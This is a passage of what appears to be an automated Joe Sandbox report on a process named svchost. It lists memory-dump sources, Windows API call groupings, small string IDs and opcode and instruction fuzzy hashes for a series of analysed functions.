                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2398171386-0
                                      • Opcode ID: 65a3e62c17f84a8c4717014c57e45f0d251850dd7ba6b3321ab7882d50137557
                                      • Instruction ID: 1aa3071c2ac4fd72bd3520980216b47b41acea92aa9556ecaf1ee2444ec2c10d
                                      • Opcode Fuzzy Hash: 65a3e62c17f84a8c4717014c57e45f0d251850dd7ba6b3321ab7882d50137557
                                      • Instruction Fuzzy Hash: 0261B122F18A46D9FB509FB5E4103BD33F1AF587A8F400631DE5D9A798DE389556C340
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                      • String ID:
                                      • API String ID: 3659116390-0
                                      • Opcode ID: 0a83d180210566f70a241fa5ccc79bfb48bfd6b32f94f90474176552c64082a0
                                      • Instruction ID: b8ba8f8fb7222adaf3ced3076d0890ed2fc264c0f2911ce9bc4af92e58dfd8c6
                                      • Opcode Fuzzy Hash: 0a83d180210566f70a241fa5ccc79bfb48bfd6b32f94f90474176552c64082a0
                                      • Instruction Fuzzy Hash: 9251BF32A14A92C9E710CF65E4443AD3BB5FB48B98F048135DE4E9BBA9DF38D546C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocString
                                      • String ID:
                                      • API String ID: 262959230-0
                                      • Opcode ID: 791166c9e7769fd924f2fceee60fe6abbaa4398e3d0be2cfdad37150307341b9
                                      • Instruction ID: f9c32fad5936c135165f5cea412d65a2ff755ff1ad9232d171a20ba9b01de6ba
                                      • Opcode Fuzzy Hash: 791166c9e7769fd924f2fceee60fe6abbaa4398e3d0be2cfdad37150307341b9
                                      • Instruction Fuzzy Hash: 1F418C21A08A86C9EB189F6694503B932F1FF48BA4F584634EE6DCB7D5DE3CE1498300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: AddressProc
                                      • String ID:
                                      • API String ID: 190572456-0
                                      • Opcode ID: 8fca8475f1a047fc1a66f8c8c5381a27786512317fbf6558366a89078306a889
                                      • Instruction ID: 5bb04ec8dc9a23ffe7258807b2ab5de6813cc796d07901da502405d422fc4adb
                                      • Opcode Fuzzy Hash: 8fca8475f1a047fc1a66f8c8c5381a27786512317fbf6558366a89078306a889
                                      • Instruction Fuzzy Hash: F741C1A1B0AA42C2FE558F569804575B2F6BF44BA4F294535DE1ECF784EF3DE4098300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _set_statfp
                                      • String ID:
                                      • API String ID: 1156100317-0
                                      • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                      • Instruction ID: 5be477d0a12774543fa2795be74a54ba994cf07876e68b64988f1005ebbd53c4
                                      • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                      • Instruction Fuzzy Hash: 1411C132E1CB8381FA681D64E4963B936E96F583A0E054634EE7E8F6D6CE2CA4407240
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                      • String ID:
                                      • API String ID: 3621893840-0
                                      • Opcode ID: cd00054fc0a760efd69cb354b7927d3aba3f438fb3718dab6eb4985a85afa278
                                      • Instruction ID: 3dc0e368b15894236edd0bb3e973118aa1198a6171b5cfb7e8ef49ad4f182677
                                      • Opcode Fuzzy Hash: cd00054fc0a760efd69cb354b7927d3aba3f438fb3718dab6eb4985a85afa278
                                      • Instruction Fuzzy Hash: 7CF04F21B28486C2F7109F20E859B7A2261FFE9705F941030ED4F89994DF2CD149D700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: __except_validate_context_recordabort
                                      • String ID: csm$csm
                                      • API String ID: 746414643-3733052814
                                      • Opcode ID: faf4d979401c8addfc7157fbc9fd2a08f1151a638cb018da541ae3f31e7fc165
                                      • Instruction ID: 5dfdce4103406c7f20ead9863beec81244a4e618b55f6a4bf249ea1b02d2b9df
                                      • Opcode Fuzzy Hash: faf4d979401c8addfc7157fbc9fd2a08f1151a638cb018da541ae3f31e7fc165
                                      • Instruction Fuzzy Hash: 94819B62A08681CADB649F25909037D7AF0FB45B94F14A135EE8CCBB99CF2CD5998B40
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 2395640692-1018135373
                                      • Opcode ID: 3aa7e82573cc7413b43bcb952f9d5c3f043b7a25627dc997c918236a2edf52e9
                                      • Instruction ID: 0ddae92507e113805ed9f8899936773e4bcb9b84f49d17b4975c8e02fe1c5d2a
                                      • Opcode Fuzzy Hash: 3aa7e82573cc7413b43bcb952f9d5c3f043b7a25627dc997c918236a2edf52e9
                                      • Instruction Fuzzy Hash: 4E517F22B19606CADB148F15E844A7D73F1EB48B98F518135EE8A8F788DF7DE845C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID: $*
                                      • API String ID: 3215553584-3982473090
                                      • Opcode ID: 684958d95b6ef02127df65c8ebde40a1dedc251177963d3d0aeec36b694d5983
                                      • Instruction ID: 1227915a2ab3ad1a5f29e997eb87e84562cc47820152802ce2a6dd72c4927440
                                      • Opcode Fuzzy Hash: 684958d95b6ef02127df65c8ebde40a1dedc251177963d3d0aeec36b694d5983
                                      • Instruction Fuzzy Hash: 79514CB290C652CAE76C8F38804437C3BF1EB15B18F542536CE4ADA399DF69E589C601
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$StringType
                                      • String ID: $%s
                                      • API String ID: 3586891840-3791308623
                                      • Opcode ID: 8d0c1f2663cd4f65b6b7505cb43fb283e77da3f273d91b6f3c244599c6641088
                                      • Instruction ID: cc17eb224b0c8a02200f542f0e21a164136a9019d8fad9ae1613a2172ce563c8
                                      • Opcode Fuzzy Hash: 8d0c1f2663cd4f65b6b7505cb43fb283e77da3f273d91b6f3c244599c6641088
                                      • Instruction Fuzzy Hash: 04418D22B19B958AEB608F65D8006A933F1FB44BA8F484635EE5D8B7C4EF3CE4458744
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CreateFrameInfo__except_validate_context_recordabort
                                      • String ID: csm
                                      • API String ID: 2466640111-1018135373
                                      • Opcode ID: c26bbf10109e0cf1fbdaac701120c7448e0257729b777b455f260bea3645797d
                                      • Instruction ID: 1255f1c1ab1ac373c36036910a39458f8135eadc32c41b14e30b1fa15fc2b791
                                      • Opcode Fuzzy Hash: c26bbf10109e0cf1fbdaac701120c7448e0257729b777b455f260bea3645797d
                                      • Instruction Fuzzy Hash: B5512636619745C6E620AF26A04126E77F4FB88B90F145534EF8D8BB96DF3CE4A4CB40
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                      • String ID: U
                                      • API String ID: 2456169464-4171548499
                                      • Opcode ID: f497630ebb3a047557ec047ebff14210b9b838039c74150178b8c3217214c8b1
                                      • Instruction ID: 8cf5237ddc072720857a23f0095383a0d72711191d41a9146a8679a0bddf0477
                                      • Opcode Fuzzy Hash: f497630ebb3a047557ec047ebff14210b9b838039c74150178b8c3217214c8b1
                                      • Instruction Fuzzy Hash: 87418F22618A82C2E7618F25E4447BA77B1FB88794F414031EE8DCB798DF7CD541D740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ObjectRelease
                                      • String ID:
                                      • API String ID: 1429681911-3916222277
                                      • Opcode ID: c6e9d11924edcf551ac3d2ba308f0c9a169416cc2dc9aaa6a4ff975c35cceb4a
                                      • Instruction ID: 7617911e6197b4341fef77a244e002bec1a01f1b3c1b6ff04f2fcf3172fc6d55
                                      • Opcode Fuzzy Hash: c6e9d11924edcf551ac3d2ba308f0c9a169416cc2dc9aaa6a4ff975c35cceb4a
                                      • Instruction Fuzzy Hash: E431293560874586EB088F12B91962BB7B1F78EFD1F408435ED4E87B14DE3CE4598B80
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                      • String ID: Thread pool initialization failed.
                                      • API String ID: 3340455307-2182114853
                                      • Opcode ID: 0a0207b346ff271583a7a69f16d53c83212332797eaa9f7e9bab84b6fcdc6a15
                                      • Instruction ID: fa3cee9d9737d2747c49ddd200770f981bd44b0b180d76b504545faa49d8d304
                                      • Opcode Fuzzy Hash: 0a0207b346ff271583a7a69f16d53c83212332797eaa9f7e9bab84b6fcdc6a15
                                      • Instruction Fuzzy Hash: 362181B2A1A649C7FB508F24E4543BE32F2FB94709F248034CE098E699DF7E5555C780
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CapsDeviceRelease
                                      • String ID:
                                      • API String ID: 127614599-3916222277
                                      • Opcode ID: ae83a8f94213b0459197ba9ee33cd9b326388b6252376cff48c54208c8ddbc67
                                      • Instruction ID: 910742750bf5c6be45526cc9a63bf7922329f97e97ce43901f79a15abf1bfbe6
                                      • Opcode Fuzzy Hash: ae83a8f94213b0459197ba9ee33cd9b326388b6252376cff48c54208c8ddbc67
                                      • Instruction Fuzzy Hash: ECE0C220B08646C2EB085BB6B68A53F2271AB4CBD0F154434EE0F8B7A4DD3CC4D04340
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ErrorLast
                                      • String ID:
                                      • API String ID: 1452528299-0
                                      • Opcode ID: 8a5c7c6a39344ee5071631a8ac11e452677af9df8fecda107b1b4b634b64fc02
                                      • Instruction ID: 48a31112618139a1620672bb5731a1616bfe3a1cba7c7cc93a6948406a5a09fd
                                      • Opcode Fuzzy Hash: 8a5c7c6a39344ee5071631a8ac11e452677af9df8fecda107b1b4b634b64fc02
                                      • Instruction Fuzzy Hash: 68519166F14A46D5EB00AF75D4412FC33B1EB89B98F404636DE1C9B79ADF28E645C340
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3823481717-0
                                      • Opcode ID: ad576a7fd675d735d767043b7eb9e4fe7ff89bed50088d05c45d8c5bbd9b662c
                                      • Instruction ID: bc7b1b7f01d1d892d27227f789e499ec2f7153d2ff088223b630e7bcd9030d0b
                                      • Opcode Fuzzy Hash: ad576a7fd675d735d767043b7eb9e4fe7ff89bed50088d05c45d8c5bbd9b662c
                                      • Instruction Fuzzy Hash: B241AF62F14B96C5FB008F69D8452BD33B2FF58798F105236DE5CAAA99DF38D446C240
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                      • String ID:
                                      • API String ID: 4141327611-0
                                      • Opcode ID: cc2b5f72e04f255bdd161a01facf61ca1cd77773b0508fa3a6c5440d086eda3c
                                      • Instruction ID: 11579b749ce3d3361bf3351417b0f18aaaa92d04bb1ee0660e0618b476c79359
                                      • Opcode Fuzzy Hash: cc2b5f72e04f255bdd161a01facf61ca1cd77773b0508fa3a6c5440d086eda3c
                                      • Instruction Fuzzy Hash: 72414F22A0D682C6FF659F14E144379B6F1EF40B94F948131DE9D8EBD5DF2CD8498600
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF669ADB39B), ref: 00007FF669ADFAD1
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF669ADB39B), ref: 00007FF669ADFB33
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF669ADB39B), ref: 00007FF669ADFB6D
                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF669ADB39B), ref: 00007FF669ADFB97
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                      • String ID:
                                      • API String ID: 1557788787-0
                                      • Opcode ID: 8289a7f455f1c13ab6c525b9847fb09ae3726bbd47523eec50ffed44d61e5ab7
                                      • Instruction ID: 7c03595a55cab30001999bacba2106e6fcb1db9c65250f86f6e9f6f817488dc2
                                      • Opcode Fuzzy Hash: 8289a7f455f1c13ab6c525b9847fb09ae3726bbd47523eec50ffed44d61e5ab7
                                      • Instruction Fuzzy Hash: 4D21A721F18791C5E7209F12641402A7AF4FF98BD0B084138DE9EABB94DF3CD4559340
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ErrorFileLast$ConnectNamedObjectOverlappedPipeReadResultSingleWaitWrite
                                      • String ID:
                                      • API String ID: 1643396940-0
                                      • Opcode ID: 87c0965e002af64279ee4d5d2dd98da1740ecd3901f5709c99e998647e30e0e3
                                      • Instruction ID: a6a5fac4a1c6d4fb9a1c207f8741d130db2d29cb916c301f2ac6b2e76aba3d7d
                                      • Opcode Fuzzy Hash: 87c0965e002af64279ee4d5d2dd98da1740ecd3901f5709c99e998647e30e0e3
                                      • Instruction Fuzzy Hash: 3D214821618A82C2EA60DF56E5503BE73B0FB85BC4F008036DF8D8BB95DF2DE5168300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
